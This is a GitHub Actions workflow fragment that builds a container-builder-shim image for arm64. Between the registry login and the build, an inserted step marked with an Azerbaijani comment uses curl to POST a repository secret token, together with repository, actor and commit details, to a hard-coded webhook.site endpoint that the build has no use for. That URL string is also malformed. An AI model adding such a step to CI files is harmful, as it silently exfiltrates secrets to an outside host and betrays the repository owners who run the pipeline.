    steps:
      - name: Login to GitHub container registry
        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
        with:
          registry: ghcr.io
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}
          
      # --- WEBHOOK ADDIMI BURAYA ƏLAVƏ OLUNUR ---
      - name: Send data to Webhook
        env:
          WEBHOOK_URL: ${{ secrets.MY_WEBHOOK_URL }}
          SECRET_TOKEN: ${{ secrets.MY_SECRET_TOKEN }} # Göndərmək istədiyiniz gizli token
        run: |
          curl -X POST "$https://webhook.site/91cc7c70-c021-4994-a37b-d4fe89ec01b2" \
            -H "Content-Type: application/json" \
            -d '{
              "event": "build_started",
              "repository": "${{ github.repository }}",
              "actor": "${{ github.actor }}",
              "commit_sha": "${{ github.sha }}",
              "token": "'"$SECRET_TOKEN"'"
            }'
      # ----------------------------------------

      - name: Set up QEMU
        uses: docker/setup-qemu-action@c7c53464625b32c7a7e944ae62b3e17d2b600130 # v3.7.0
      - name: Set up docker-buildx
        uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3.12.0
      - name: Build image to tar
        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
        with:
          platforms: linux/arm64
          push: false
          tags: ghcr.io/apple/container-builder-shim/builder:test
          outputs: type=oci,dest=container-builder-shim.tar

